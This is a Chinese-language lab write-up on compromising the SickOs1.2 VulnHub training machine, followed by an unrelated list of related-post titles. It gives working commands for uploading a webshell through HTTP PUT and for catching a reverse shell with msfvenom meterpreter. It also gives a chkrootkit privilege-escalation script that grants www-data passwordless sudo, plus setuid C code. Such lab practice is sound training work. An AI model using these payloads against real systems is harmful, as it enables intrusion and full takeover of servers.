一、实验环境

靶机:SickOs1.2,IP地址暂时未知

测试机:Kali(IP:192.168.232.130)

测试机:物理机win7

二、实验流程

信息收集——主机发现

信息收集——端口扫描

渗透测试

三、实验步骤

(一)信息收集——主机发现

1、查看kaliIP信息

2、查看靶机页面

3、扫描主机(netdiscover)

netdiscover -i eth0 -r 192.168.232.0/24

netdiscover: -i 指定网卡 -r 指定网段

(二)信息收集——端口扫描

1、扫描端口(masscan)

masscan --rate=10000 --ports 0-65535 192.168.232.136

目标主机开放80、22端口

2、详细扫描端口信息(nmap)

nmap -T4 -sV -O -p 22,80 192.168.232.136

22:ssh

80:http

(三)渗透测试

80端口(http服务)

1、访问目标靶机的80端口

192.168.232.136:80

未发现可利用信息

2、网站目录扫描(dirb)

dirb http://192.168.232.136

3、查看扫到的网站目录

3.1> http://192.168.232.136/index.php

3.2> http://192.168.232.136/test/

可以看到该目录下有许多可以查看的php文件,不知道是否可以把文件上传到该目录,但在该页面并没有发现文件的上传点

注:如果该页面支持http的put方法,就可以间接性的上传文件

4. 查看/test/目录支持的方法

对/test/目录OPTIONS一下,查看它支持什么方法,如果支持PUT方法,我们就可以上传文件

也可以用curl -v -X OPTIONS http://192.168.232.136/test/

支持PUT方法可以上传

5. 上传一句话木马,获取webshell

5.1> 上传一句话木马

上传成功

注:如果上传的文件存在,则返回的状态码是200,否则是201;

5.2> 使用中国蚁剑进行连接

成功获取webshell

6. 上传文件,获取反弹shell

6.1> 上传文件1.php

将Kali上的php-reverse-shell.php复制到物理机上,重命名为1.php,并修改监听的IP地址和端口;

IP:192.168.232.130

Port:443(注:换成其他高位端口不能监听成功,防火墙过滤掉了)

6.2> 上传成功

6.3> 在Kali上监听443端口;再点击上传成功的1.php文件,成功获取到shell

7. 方式2获取shell:Msfvenom生成payload

7.1> 上传一个精心构造的php webshell,使用msfvenom生成payload

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.232.130 LPORT=443 > shell_443.php

7.2> 将shell666上传到靶机的test目录下;

curl -v -H "Expect:" -T shell_443.php "http://192.168.232.136/test/"

在curl的参数中加上一个特定的HTTP Header Expect:,即将Header中Expect的值手动指定为空。

7.3> 在Kali测试机上打开msfconsole,exploit/multi/handler模块,指定IP和端口进行监听,然后放到后台。 

7.4> 使用curl访问上传到靶机上的shell666.php文件后

7.5> 即可触发服务器端反弹TCP的操作, 在msfconsole里就会得到一个meterpreter的shell

7.6> 在meterpreter中用shell命令来得到一个交互式的shell,但是并没有tty,需要用python生成一个bash。 

python -c 'import pty;pty.spawn("/bin/bash")'

获取了普通用户的权限,接下来就是提权

8、提权

8.1> 查看靶机服务器和版本信息

8.2> 扫描版本的漏洞

可以看到chkrootkit存在本地提权漏洞

8.3> 方法一:添加当前用户www-data到sudoers列表中

新建一个文件update

给update文件添加执行权限;

添加当前用户www-data到sudoers列表中;

echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update

8.4> 方法二:创建shell.c文件

在Kali上编写shell.c文件

#include<unistd.h>

void main(void)

{

system("chown root:root /tmp/update");

system("chmod 4755 /tmp/update");

setuid(0);

setgid(0);

execl("/bin/sh","sh",NULL);

}

将shell.c文件上传到靶机上

curl -v -H "Expect:" -T shell.c http://192.168.232.136/test/

四、实验总结

如果某个网站目录下有很多文件可以访问,那是否能上传文件到这里呢,可以猜想是否具有文件上传漏洞;

如果某页面支持http的put方法,就可以间接性的上传文件;

如果高位端口不能监听到信息,可以尝试监听443端口,因为防火墙可能会过滤掉非常用端口的流量;

靶机渗透实战——SickOs1.2相关推荐

  1. VulnHub靶机渗透实战9-vikings

    本次靶机是CTF风格的靶机. 靶场地址:Vikings: 1 ~ VulnHub 网络呢还是桥接模式. Description Back to the Top A CTF machine with f ...

  2. 靶机渗透SickOs1.2(非常详细,适合新手渗透)

    靶机SickOs1.2的目录 0x01靶机描述 0x02环境搭建 0x03靶机渗透 一. 信息收集 二. 漏洞挖掘 PUT方法任意写文件漏洞 1. 查看web主页 2. 查看/test目录支持的方法 ...

  3. dc-2 靶机渗透学习

    网络扫描 第一步先查看当前网段,进行主机探活 nmap -A -p- -v 192.168.202.0/24 发现80.7744端口开放 访问192.168.202.131来看看网站的80端口是啥,可 ...

  4. vulnhub之unknowndevice64-V1.0渗透实战

    vulnhub之unknowndevice64-V1.0渗透实战 0x01 环境及配置 难度:中级 目标:获取root权限并阅读/root/flag.txt 网络:桥接模式 DHCP自动分配IP地址 ...

  5. 【vulnhub】Lampiao渗透实战(脏牛提权)

    总结 1.该靶机的WEB系统的建站CMS是drupal 7,时刻关注一些cms漏洞 2.在没有思路的时候,try yourself !往往有不同的收获 3.再练练脏牛提权... Lampiao靶机百度 ...

  6. dc-3 靶机渗透学习

    靶机修复 dc-3靶机可能会存在扫不到靶机ip的问题,可以参考下面这篇博客解决,编辑网卡配置文件时命令有点错误. vim /etc/network/interfacers 改成 vim /etc/ne ...

  7. (Vulnhub练习)--Bulldog1渗透实战

    (Vulnhub练习)–Bulldog1渗透实战 下载地址 http://www.vulnhub.com/entry/bulldog-1,211/ 文章转载 靶机渗透测试实战(三)--Bulldog1 ...

  8. HA: SHERLOCK 靶机渗透取证

    HA: SHERLOCK 靶机渗透取证 靶机描述: DescriptionHA: Sherlock! This lab is based on the famous investigator's jo ...

  9. 【网络安全】2022年第一次靶场渗透实战学习

    一.介绍 渗透测试是通过模拟黑客或者骇客攻击,以评估计算机系统或者网络环境安全性的技术:主要的目的是进行安全性的评估,而不是摧毁或者破坏目标系统. 渗透测试所需要的基础技能必须有网络基础.编程基础.数 ...

最新文章

  1. 12.多线程的实现方式、线程安全问题的产生与解决以及生产者与消费者问题
  2. python 字符串去重从小到大排列_python 序列(字符串、字符串、元组、集合、字典)...
  3. python 画图 线标注_Python画图的这几种方法,你学会了吗
  4. while和for循环读取大文件三种读取文件方式
  5. (转)Oracle 临时表用法
  6. javascript中定时器interval的使用
  7. Open3d之内部形状描述子ISS
  8. Bailian2972 确定进制(POJ NOI0113-34,POJ NOI0201-1973)【暴力+进制】
  9. Redis 高级教程 Redis 安全(2)
  10. java程序cpu突然飚高_简单排查java应用CPU飙高的线程问题
  11. 实战之多有米项目测试环境搭建
  12. Iperf官方andriod版iperf3
  13. stvd能编译c语言,stvd+stm8s单片机程序编译报错
  14. 武汉大学计算机学院csc,2018年春武汉大学CSC公派出国留学录取名单
  15. 《安富莱嵌入式周报》第251期:2022.01.31--2022.02.06
  16. 分布式团队的高效站立会说明书
  17. navicat显示中文为问号
  18. Java开发 高可维护性代码规范
  19. 阿里巴巴真的会收购雅虎吗?
  20. 移动端app设计开发经验之设计篇

热门文章

  1. 集成sleuth_整合Sleuth
  2. asp.net 微信企业号 微企办公系统-部门人员同步
  3. google浏览器 Proxy SwitchyOmega 插件设置代理访问内网服务器
  4. 时尚穿越html5游戏,奇迹暖暖传统民族服饰华丽上线 开启穿越文化之旅
  5. 终极单词index 排序 Q-R
  6. 【灵修】治疗腰痛和失眠的好方法——瑜伽练习
  7. javaScript:js数据类型,模板字符串,函数
  8. template.js模板渲染
  9. Mysql 常用统计表数据方法
  10. 高级asyncio测试